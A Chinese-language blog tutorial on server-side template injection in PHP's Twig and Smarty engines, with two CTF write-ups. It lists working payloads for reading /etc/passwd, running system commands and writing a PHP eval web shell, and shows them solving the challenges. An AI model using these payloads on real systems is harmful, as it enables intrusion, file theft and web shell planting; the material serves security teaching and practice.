SSTI 就是服务器端模板注入（Server-Side Template Injection）

​ 当前使用的一些框架，比如python的flask，php的tp，java的spring等一般都采用成熟的的MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。

​ 漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。

​ 凡是使用模板的地方都可能会出现 SSTI 的问题，SSTI 不属于任何一种语言，沙盒绕过也不是，沙盒绕过只是由于模板引擎发现了很大的安全漏洞，然后模板引擎设计出来的一种防护机制，不允许使用没有定义或者声明的模块，这适用于所有的模板引擎

 

 

SSTI和SQL注入原理差不多，都是因为对输入的字符串控制不足，把输入的字符串当成命令执行。

SSTI利用的是现在的网站模板引擎，主要针对python、php、java的一些网站处理框架

SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti

 

 

这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容

SSTI模板注入_ssti注入_天猫来下凡的博客-CSDN博客
 

模板基础知识：

{% ... %} 用来声明变量

{{ ... }} 用来将表达式打印到模板输出

{# ... #} 表示未包含在模板输出中的注释

在模板注入中，主要使用的是{{}} 和 {%%}

检测是否存在ssti
在url后面，或是参数中添加 {{ 6*6 }} ，查看返回的页面中是否有 36

php中的ssti

1.Twig

Twig是来自于Symfony的模板引擎，它非常易于安装和使用。它的操作有点像Mustache和liquid

用法：

文件读取:
{{'/etc/passwd'|file_excerpt(1,30)}}
{{app.request.files.get(1).__construct('/etc/passwd','')}}
{{app.request.files.get(1).openFile.fread(99)}}
RCE:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

{{['cat /etc/passwd']|filter('system')}}

POST /subscribe?0=cat+/etc/passwd HTTP/1.1
{{app.request.query.filter(0,0,1024,{'options':'system'})}}

 

2.Smarty

Smarty是最流行的PHP模板语言之一，为不受信任的模板执行提供了安全模式。这会强制执行在 php 安全函数白名单中的函数，因此我们在模板中无法直接调用 php 中直接执行命令的函数(相当于存在了一个disable_function)

但是，实际上对语言的限制并不能影响我们执行命令，因为我们首先考虑的应该是模板本身，恰好 Smarty 很照顾我们，在阅读模板的文档以后我们发现：$smarty内置变量可用于访问各种环境变量，比如我们使用 self 得到 smarty 这个类以后我们就去找 smarty 给我们的的方法

{self::getStreamVariable("file:///etc/passwd")}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php eval($_GET['cmd']); ?>",self::clearConfig())}
常规利用方式：
1. {$smarty.version}
{$smarty.version}  #获取smarty的版本号
2. {php}{/php}
{php}phpinfo();{/php}  #执行相应的php代码
因为在Smarty3版本中已经废弃{php}标签，强烈建议不要使用。在Smarty 3.1，{php}仅在SmartyBC中可用
3. {literal}
<script language="php">phpinfo();</script>   
这种写法只适用于php5环境
4. getstreamvariable
{self::getStreamVariable("file:///etc/passwd")}
在3.1.30的Smarty版本中官方已经把该静态方法删除
5. {if}{/if}
{if phpinfo()}{/if}
Smarty的 {if} 条件判断和PHP的if非常相似，只是增加了一些特性。每个{if}必须有一个配对的{/if}，也可以使用{else} 和 {elseif}，全部的PHP条件表达式和函数都可以在if内使用，如||，or，&&，and，is_array()等等，如：{if is_array($array)}{/if}

接下来看题 关于php的ssti

[CISCN2019 华东南赛区]Web11

打开链接 在最下面发现了 Smarty 先找一下注入点 看是不是ssti注入

题目中显示API的URL由于环境的原因无法使用，但我们的IP依旧显示在了页面的右上角，根据他的提示XFF 这题应该是在X-Forwarded-For里面构造payload

先用a{*comment*}b试一试看看是不是是ssti注入

发现有回显 是smarty ssti

看一下smarty的版本    {$smarty.version}

根据这个版本发现在smarty ssti中的常用方法的2 3 4 都用不了

只能用 第5种 if 的来构造payload  先用{if phpinfo()}{/if}看能不能执行成功

用这个payload看一下根目录 {if system('ls /')}{/if}

看到了flag文件 cat一下 {if system('cat /flag')}{/if}

 [BJDCTF2020]Cookie is so stable

打开题目 有一个flag的页面和hint页面

flag页面是可以输入的 没什么思路 看看hint页面 发现也是没有什么 看一看源码

 

 说是让我们好好看看cookies

先试试{{7*7}}

发现回显49

进一步尝试 {{7*'7'}} 发现回显是49 确认是Twig ssti  如果是jinia2 ssti 就会回显7777777

抓包 找注入点

找到了注入点 在cookies里面的user

直接用twig ssti 的payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}把id改成ls /

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("ls /")}}（无效做法）

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

  只显示了var目录

  继续 /var/www

/var/www/localhost

/var/www/localhost/htdocs

 发现到这里就没有了 其实不用这么麻烦的 直接cat /flag就可以出